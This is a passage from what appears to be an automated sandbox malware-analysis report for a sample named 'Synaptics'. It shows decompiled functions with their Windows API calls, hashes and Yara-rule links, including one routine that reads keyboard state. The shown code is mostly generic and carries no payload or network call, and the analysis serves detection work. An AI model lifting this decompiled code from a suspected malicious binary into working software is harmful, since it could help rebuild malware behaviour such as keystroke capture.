                                                                                                                                                                                          • Opcode Fuzzy Hash: f7ab25cde628a71b1d3e7a452f9e7330cfbb9f35bc13c410db0fd2e7b91e3e0a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00428D80 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E00428D80(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E004259F4(_v8);
					_push(_t84);
					_push(0x428e5f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E0042A288( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L004072E0();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00407440();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00407418();
					}
					E00425CE8(_v8, _t66);
					_t58 =  *0x49b8ac; // 0x22b0acc
					E0041AFE4(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x428e66);
					return E00425B60(_v8);
				}
			}



















                                                                                                                                                                                          0x00428d81
                                                                                                                                                                                          0x00428d83
                                                                                                                                                                                          0x00428d86
                                                                                                                                                                                          0x00428d89
                                                                                                                                                                                          0x00428d90
                                                                                                                                                                                          0x00428e6a
                                                                                                                                                                                          0x00428d96
                                                                                                                                                                                          0x00428d99
                                                                                                                                                                                          0x00428da0
                                                                                                                                                                                          0x00428da1
                                                                                                                                                                                          0x00428da6
                                                                                                                                                                                          0x00428da9
                                                                                                                                                                                          0x00428db2
                                                                                                                                                                                          0x00428dc3
                                                                                                                                                                                          0x00428dce
                                                                                                                                                                                          0x00428dd3
                                                                                                                                                                                          0x00428dd5
                                                                                                                                                                                          0x00428dda
                                                                                                                                                                                          0x00428de5
                                                                                                                                                                                          0x00428dea
                                                                                                                                                                                          0x00428e00
                                                                                                                                                                                          0x00428dec
                                                                                                                                                                                          0x00428df6
                                                                                                                                                                                          0x00428df6
                                                                                                                                                                                          0x00428e09
                                                                                                                                                                                          0x00428e0c
                                                                                                                                                                                          0x00428e11
                                                                                                                                                                                          0x00428e2f
                                                                                                                                                                                          0x00428e13
                                                                                                                                                                                          0x00428e13
                                                                                                                                                                                          0x00428e15
                                                                                                                                                                                          0x00428e16
                                                                                                                                                                                          0x00428e17
                                                                                                                                                                                          0x00428e1f
                                                                                                                                                                                          0x00428e22
                                                                                                                                                                                          0x00428e23
                                                                                                                                                                                          0x00428e23
                                                                                                                                                                                          0x00428e37
                                                                                                                                                                                          0x00428e3f
                                                                                                                                                                                          0x00428e44
                                                                                                                                                                                          0x00428e4b
                                                                                                                                                                                          0x00428e4e
                                                                                                                                                                                          0x00428e51
                                                                                                                                                                                          0x00428e5e
                                                                                                                                                                                          0x00428e5e

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                                                                                                                                                            • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                                                                                                                                                            • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                                                                                                                                                            • Part of subcall function 0042A288: 73CCAC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                            • Part of subcall function 0042A288: 73CCAD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                            • Part of subcall function 0042A288: 73CCAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                            • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                            • Part of subcall function 0042A288: 73CCB380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                          • 73CCA590.GDI32(00000000,00000000,00428E5F), ref: 00428DD5
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                                                                                                                                                          • 73CCB410.GDI32(00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E17
                                                                                                                                                                                          • 73CCB150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E23
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2198039625-0
                                                                                                                                                                                          • Opcode ID: 06edad1a3cdf261bad1c94378f0d5fdbdf9d6fe4f865de9f2575fa66755788ab
                                                                                                                                                                                          • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 06edad1a3cdf261bad1c94378f0d5fdbdf9d6fe4f865de9f2575fa66755788ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047689C Relevance: 6.1, APIs: 4, Instructions: 81keyboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				short _v6;
				char _v262;
				int _v268;
				char _v272;
				struct HKL__* _t25;
				struct HKL__* _t28;
				int _t30;
				void* _t45;
				unsigned int _t52;
				intOrPtr _t56;
				int _t65;
				void* _t68;

				_v272 = 0;
				_v268 = 0;
				_t45 = __edx;
				_push(_t68);
				_push(0x47699d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffef4;
				 *0x49ec4c = GetKeyboardLayout(0);
				GetKeyboardState( &_v262);
				_t25 =  *0x49ec4c; // 0x0
				_t28 =  *0x49ec4c; // 0x0
				_t65 =  *(_t45 + 4);
				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
				_t52 =  *(_t45 + 8);
				if((_t52 & 0x80000000) != 0) {
					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
						E00404BA8();
						E00476A9C(_t45, _v272,  *(_t45 + 4));
					}
				} else {
					if(_t30 <= 0) {
						 *0x49ec50 =  *(_t45 + 4);
					} else {
						E00404BA8();
						E00476A9C(_t45, _v268,  *(_t45 + 4));
						 *0x49ec50 = 0;
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x4769a4);
				return E004049E4( &_v272, 2);
			}















                                                                                                                                                                                          0x004768aa
                                                                                                                                                                                          0x004768b0
                                                                                                                                                                                          0x004768b6
                                                                                                                                                                                          0x004768bc
                                                                                                                                                                                          0x004768bd
                                                                                                                                                                                          0x004768c2
                                                                                                                                                                                          0x004768c5
                                                                                                                                                                                          0x004768cf
                                                                                                                                                                                          0x004768db
                                                                                                                                                                                          0x004768e0
                                                                                                                                                                                          0x004768f3
                                                                                                                                                                                          0x004768fb
                                                                                                                                                                                          0x00476906
                                                                                                                                                                                          0x0047690b
                                                                                                                                                                                          0x00476914
                                                                                                                                                                                          0x00476952
                                                                                                                                                                                          0x0047696a
                                                                                                                                                                                          0x0047697a
                                                                                                                                                                                          0x0047697a
                                                                                                                                                                                          0x00476916
                                                                                                                                                                                          0x00476918
                                                                                                                                                                                          0x00476944
                                                                                                                                                                                          0x0047691a
                                                                                                                                                                                          0x00476923
                                                                                                                                                                                          0x00476933
                                                                                                                                                                                          0x0047693a
                                                                                                                                                                                          0x0047693a
                                                                                                                                                                                          0x00476918
                                                                                                                                                                                          0x00476981
                                                                                                                                                                                          0x00476984
                                                                                                                                                                                          0x00476987
                                                                                                                                                                                          0x0047699c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 004768CA
                                                                                                                                                                                          • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                                                                                                                                                          • MapVirtualKeyExA.USER32 ref: 004768FF
                                                                                                                                                                                          • ToAsciiEx.USER32(?,00000000,?,00000002,00000000,?), ref: 00476906
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Keyboard$AsciiLayoutStateVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 692081290-0
                                                                                                                                                                                          • Opcode ID: 369cad89c0988fd3de251049eacc826bb87c6d6fc67fae28854ac0164a97fde1
                                                                                                                                                                                          • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                                                                                                                                                          • Opcode Fuzzy Hash: 369cad89c0988fd3de251049eacc826bb87c6d6fc67fae28854ac0164a97fde1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044E7A8 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044DEB4(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0044DD30(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0044DD30(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00409F88(_a12, _t49);
				}
			}










                                                                                                                                                                                          0x0044e7af
                                                                                                                                                                                          0x0044e7b1
                                                                                                                                                                                          0x0044e7b3
                                                                                                                                                                                          0x0044e7be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044e842
                                                                                                                                                                                          0x0044e7c2
                                                                                                                                                                                          0x0044e7d2
                                                                                                                                                                                          0x0044e7ef
                                                                                                                                                                                          0x0044e7f4
                                                                                                                                                                                          0x0044e7f9
                                                                                                                                                                                          0x0044e806
                                                                                                                                                                                          0x0044e806
                                                                                                                                                                                          0x0044e7d4
                                                                                                                                                                                          0x0044e7db
                                                                                                                                                                                          0x0044e7e8
                                                                                                                                                                                          0x0044e7e8
                                                                                                                                                                                          0x0044e80d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044e80f
                                                                                                                                                                                          0x0044e812
                                                                                                                                                                                          0x0044e821
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044e829

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$ItemStateString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 306270399-0
                                                                                                                                                                                          • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                          • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00474C10 Relevance: 6.1, APIs: 4, Instructions: 58libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                          			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				void* _t19;
				intOrPtr _t35;
				intOrPtr _t36;
				struct HINSTANCE__* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;

				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t42);
				_push(0x474cbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_push(_t42);
				_push(0x474c8c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t44;
				_t40 = LoadLibraryA(E00404E80(_v8));
				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
				if(_t19 != 0) {
				}
				FreeResource(_t19);
				FreeLibrary(_t40);
				_pop(_t35);
				 *[fs:eax] = _t35;
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00474CC6);
				return E004049E4( &_v12, 2);
			}












                                                                                                                                                                                          0x00474c11
                                                                                                                                                                                          0x00474c13
                                                                                                                                                                                          0x00474c19
                                                                                                                                                                                          0x00474c1c
                                                                                                                                                                                          0x00474c22
                                                                                                                                                                                          0x00474c2a
                                                                                                                                                                                          0x00474c31
                                                                                                                                                                                          0x00474c32
                                                                                                                                                                                          0x00474c37
                                                                                                                                                                                          0x00474c3a
                                                                                                                                                                                          0x00474c3f
                                                                                                                                                                                          0x00474c40
                                                                                                                                                                                          0x00474c45
                                                                                                                                                                                          0x00474c48
                                                                                                                                                                                          0x00474c59
                                                                                                                                                                                          0x00474c67
                                                                                                                                                                                          0x00474c6e
                                                                                                                                                                                          0x00474c6e
                                                                                                                                                                                          0x00474c77
                                                                                                                                                                                          0x00474c7d
                                                                                                                                                                                          0x00474c84
                                                                                                                                                                                          0x00474c87
                                                                                                                                                                                          0x00474ca6
                                                                                                                                                                                          0x00474ca9
                                                                                                                                                                                          0x00474cac
                                                                                                                                                                                          0x00474cbe

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C54
                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C77
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF,?,?,?,00000000), ref: 00474C7D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibraryResource$FindLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 622515136-0
                                                                                                                                                                                          • Opcode ID: 8efc9c8d1afb4118e30eb2d73a1a1dfbf47189c447e796e54b6773ca4f929656
                                                                                                                                                                                          • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8efc9c8d1afb4118e30eb2d73a1a1dfbf47189c447e796e54b6773ca4f929656
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00459634 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00459634(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x49ebb8; // 0x22b1714
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E004595C4, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E0041AC6C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                                                                                                                                                                          0x00459636
                                                                                                                                                                                          0x00459639
                                                                                                                                                                                          0x0045963b
                                                                                                                                                                                          0x00459644
                                                                                                                                                                                          0x00459651
                                                                                                                                                                                          0x0045965a
                                                                                                                                                                                          0x0045965d
                                                                                                                                                                                          0x00459669
                                                                                                                                                                                          0x0045966e
                                                                                                                                                                                          0x0045966e
                                                                                                                                                                                          0x00459678
                                                                                                                                                                                          0x00459686
                                                                                                                                                                                          0x00459688
                                                                                                                                                                                          0x00459695
                                                                                                                                                                                          0x00459697
                                                                                                                                                                                          0x00459697
                                                                                                                                                                                          0x0045969e
                                                                                                                                                                                          0x0045969e
                                                                                                                                                                                          0x004596a7
                                                                                                                                                                                          0x004596ab
                                                                                                                                                                                          0x004596ad
                                                                                                                                                                                          0x004596c1
                                                                                                                                                                                          0x004596cd
                                                                                                                                                                                          0x004596d2
                                                                                                                                                                                          0x004596d3
                                                                                                                                                                                          0x004596ad
                                                                                                                                                                                          0x004596ab
                                                                                                                                                                                          0x00459678
                                                                                                                                                                                          0x004596d8
                                                                                                                                                                                          0x004596d8
                                                                                                                                                                                          0x004596e2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumWindows.USER32(004595C4), ref: 00459669
                                                                                                                                                                                          • GetWindow.USER32(00000003,00000003), ref: 00459681
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 0045968E
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004596CD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$EnumLongWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4191631535-0
                                                                                                                                                                                          • Opcode ID: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                                                                                                                                                          • Instruction ID: e023c87b117193a46b59b10cd2d90065ddfa048c4e1cca94785ca85305bb7b15
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 49117331609210AFD711EB28CC85F9673D4AB05765F18017AFDA8AF2D3C378AC49C75A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409AB8 Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409AB8(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E00404C30( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}








                                                                                                                                                                                          0x00409ab9
                                                                                                                                                                                          0x00409abc
                                                                                                                                                                                          0x00409ad8
                                                                                                                                                                                          0x00409acf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00409ad1
                                                                                                                                                                                          0x00409ad1
                                                                                                                                                                                          0x00409ad1
                                                                                                                                                                                          0x00409b17
                                                                                                                                                                                          0x00409b1a
                                                                                                                                                                                          0x00409b1a
                                                                                                                                                                                          0x00409ae5
                                                                                                                                                                                          0x00409af4
                                                                                                                                                                                          0x00409afc
                                                                                                                                                                                          0x00409b02
                                                                                                                                                                                          0x00409b10
                                                                                                                                                                                          0x00409b15
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00409AC8
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 00409AD1
                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                          • FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2103556486-0
                                                                                                                                                                                          • Opcode ID: d906423d74c056d326f42be663fdf599edb042cfec1364b1f9e16dd5749ab691
                                                                                                                                                                                          • Instruction ID: 4a410686d79e47fa2b0968ed75fbe7b0933b14da80f461b342b6a519e83f05d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: d906423d74c056d326f42be663fdf599edb042cfec1364b1f9e16dd5749ab691
                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF01DB26042019BCF04DFA9D8C288733ACAB4831431445B7AD16DF28BE638E9549BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00438CE0 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00438CE0(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x49eb28; // 0x22b1290
					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
						_t16 = 0 | E00437E28(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                                                                                                                                                                          0x00438ce0
